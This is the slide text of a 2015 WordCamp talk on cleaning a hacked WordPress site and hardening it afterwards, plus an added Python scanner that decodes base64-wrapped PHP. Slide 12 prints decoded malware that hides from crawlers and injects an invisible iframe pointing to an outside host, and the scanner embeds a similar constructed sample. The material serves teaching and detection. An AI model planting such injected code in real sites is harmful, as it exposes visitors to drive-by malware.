You Have Been Hacked? Now What?

WordCamp San Diego 2015. Learn what you need to do once your website gets hacked and how to keep it from happening again.


Michele Butcher

March 28, 2015


  1. Your Site Has Been Hacked, Now What? Michele Butcher, CantSpeakGeek.com, WPSecurityLock.com, @Michele_Butcher. Slides can be found at: http://mlb.pw/WCSD2015
  2. Michele Butcher
     • WordPress Specialist at WP Security Lock
     • Head Geek at Speak Geek
     • Sometimes a designer of pretty websites and graphics
     • Southern Illinois Meetup Co-Organizer
     • Beginners and Intermediate WordPress Instructor at John A Logan College
  3. It all starts one dreadful morning……
  4. First you see this
  5. Then you realize this has happened
  6. Which made you feel like this…
  7. What do you do when your site gets hacked?
  8. First option: Pay someone else to clean it. There are many options out there that will clean your site. Here is who I suggest.
     • WP Security Lock https://wpsecuritylock.com
     • Sucuri Security http://sucuri.net/
     • Hack Repair http://hackrepair.com
  9. Second Option: Clean it yourself
     • Cheapest
     • Most time consuming
     • No one knows your site better than you do
     • You just have to know what to look for
     I do not suggest this if you are not comfortable reading HTML, PHP, and CSS.
  10. Pretty Code
  11. Not So Pretty Code <?php eval(base64_decode('…'));
  12. The code from slide 11 after base64 decoding:

      <?php
      error_reporting(0);
      $bot = FALSE;
      // User-agent substrings treated as crawlers or scanners
      $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo',
          'yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com',
          'anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools',
          'arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent',
          'download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx',
          'szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
      // Start/end pairs of IP ranges that are also treated as crawlers
      $stop_ips_masks = array(
          array("",""), array("",""), array("",""), array("",""), array("",""), array("",""),
          array("",""), array("",""), array("",""), array("",""), array("",""), array("",""),
          array("",""), array("",""), array("",""), array("",""), array("",""), array("",""),
          array("",""), array("",""), array("",""), array("","")
      );
      $my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
      foreach ($stop_ips_masks as $IPs) {
          $first_d = sprintf("%u", ip2long($IPs[0]));
          $second_d = sprintf("%u", ip2long($IPs[1]));
          if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) { $bot = TRUE; break; }
      }
      foreach ($user_agent_to_filter as $bot_sign) {
          if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false) { $bot = true; break; }
      }
      // Every other visitor is served an off-screen 2x2 iframe
      if (!$bot) {
          echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
      }
  13. When cleaning your site, add clean copies of core, your theme and your plugins. It makes cleaning so much easier.
  14. This is a good time to make an audit of everything on your site and delete what is not being used. You can always add other themes and plugins back later when you need them.
  15. Now you have all the malware removed, but that does not mean we are done
  16. Change the salts in your wp-config.php file
  17. Check your users!
     • You could have unwanted users
     • Delete the unwanted guests immediately
     • If you use “admin” as a username, delete it and make a new user name
     • Delete all users that are no longer using your dashboard (old devs, designers, guests)
     • Only give others the access they need, not what they want. A guest blogger should never be an admin, only a contributor.
  18. Check your FTP accounts on your server. You could have unwanted users here as well.
  19. Check your File Permissions
     • Files should be 644
     • Directories should be 755
  20. Add some Security to your site. Some trusted plugins:
     • iThemes Security or iThemes Security Pro
     • Jetpack (BruteProtect and VaultPress)
     • WordFence
     • Sucuri Firewall
  21. Change your login information
     • WordPress logins and passwords
     • cPanel logins and passwords
     • Database logins and passwords (remember to change them in your wp-config.php)
     • Hosting logins and passwords
  22. When it comes to usernames and passwords, here are a few tips.
     • NEVER use “admin” as a username and “password” as the password. NEVER on anything!
     • The harder a password is to remember, the harder it is to hack
     • Use something like LastPass, 1Password, or KeePass to store your passwords
  23. What do you do to not get hacked again?
  24. First and most important! UPDATE UPDATE
     Update core, update plugins, update themes!
  25. A note on updating: If you use a theme and/or plugin that was purchased from Envato, Theme Forest, or Code Canyon please mark the box under each purchased item on the download page to be notified by email of updates. That is the only way they notify their customers of updates. This is part of the reason the RevSlider Soak Soak infection was so high.
  26. Pay attention to WordPress news and security sites
     • WP Tavern
     • WP Security Bloggers
     • Sucuri Blog
     • WP Security Lock
     • Advanced WordPress (Facebook)
     • Twitter
  27. Only use trusted and supported themes and plugins. Do NOT use a theme or plugin if:
     • It has not been updated in more than a year
     • No one is responding in the support forums
     • It shows that it does not work in the current version of core
  28. Start Making Backups
     • Backup Buddy
     • BackWPUp
     • VaultPress (Jetpack)
     • Check with your hosting company to see if they do backups as well
     • iThemes Security (free and Pro) will do database backups
  29. Speaking of backups… Save them somewhere other than your server. Most have options to send them to an Amazon S3 account, Dropbox, email, or download to your machine.
  30. Lastly, be active with your site. You know your site best. If something does not feel right, look into it. Also, do not ignore your website. No one likes a zombie website.
  31. And remember…
  32. Don’t Let Security Make You This Guy!
  33. Questions?
  34. Thank you! Michele Butcher http://CantSpeakGeek.com https://WPSecurityLock.com Slides can be found at: http://mlb.pw/WCSD2015
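
Slides 11 and 12 show the same file before and after decoding. As an added example (not from the talk), this Python script finds `eval(base64_decode(...))` wrappers in a tree of PHP files and decodes them statically for review, without ever running the PHP; the function names, the marker list and the sample tree with its `example.invalid` host are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode('...')), either quote style, wrapped lines allowed.
WRAPPER = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# Traits to flag in the decoded text (assumed list, modelled on slide 12).
MARKERS = {
    "hidden_iframe": re.compile(rb"<iframe[^>]+src=[\"'][^\"']+", re.I),
    "ip_cloaking": re.compile(rb"REMOTE_ADDR"),
    "nested_eval": re.compile(rb"\beval\s*\(", re.I),
    "ua_cloaking": re.compile(rb"HTTP_USER_AGENT"),
}

def decode_payloads(source: bytes):
    """Yield each wrapped payload, decoded statically; the PHP is never executed."""
    for match in WRAPPER.finditer(source):
        try:
            yield base64.b64decode(re.sub(rb"\s+", b"", match.group(2)), validate=True)
        except ValueError:  # invalid base64: leave the file for manual review
            continue

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map each *.php file holding a wrapped payload to the traits it shows."""
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        for payload in decode_payloads(path.read_bytes()):
            hits = [name for name, rx in MARKERS.items() if rx.search(payload)]
            findings.setdefault(rel, []).extend(hits or ["obfuscated_eval"])
    return findings

def build_sample(root: Path) -> None:
    """Constructed sample tree: one clean file and one wrapped like slide 11."""
    payload = (b"error_reporting(0); if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') === false)"
               b" { echo '<iframe src=\"http://malware.example.invalid/x\" width=\"2\"></iframe>'; }")
    (root / "wp-content").mkdir()
    (root / "index.php").write_bytes(b"<?php require 'wp-blog-header.php';\n")
    (root / "wp-content" / "footer.php").write_bytes(
        b"<?php eval(base64_decode('" + base64.b64encode(payload) + b"'));\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(Path(tmp))
        print(scan_tree(Path(tmp)))
```

Files it reports are candidates for replacement with the clean copies of core, theme and plugins mentioned on slide 13; a file it does not report is not thereby proven clean, since other obfuscation wrappers exist.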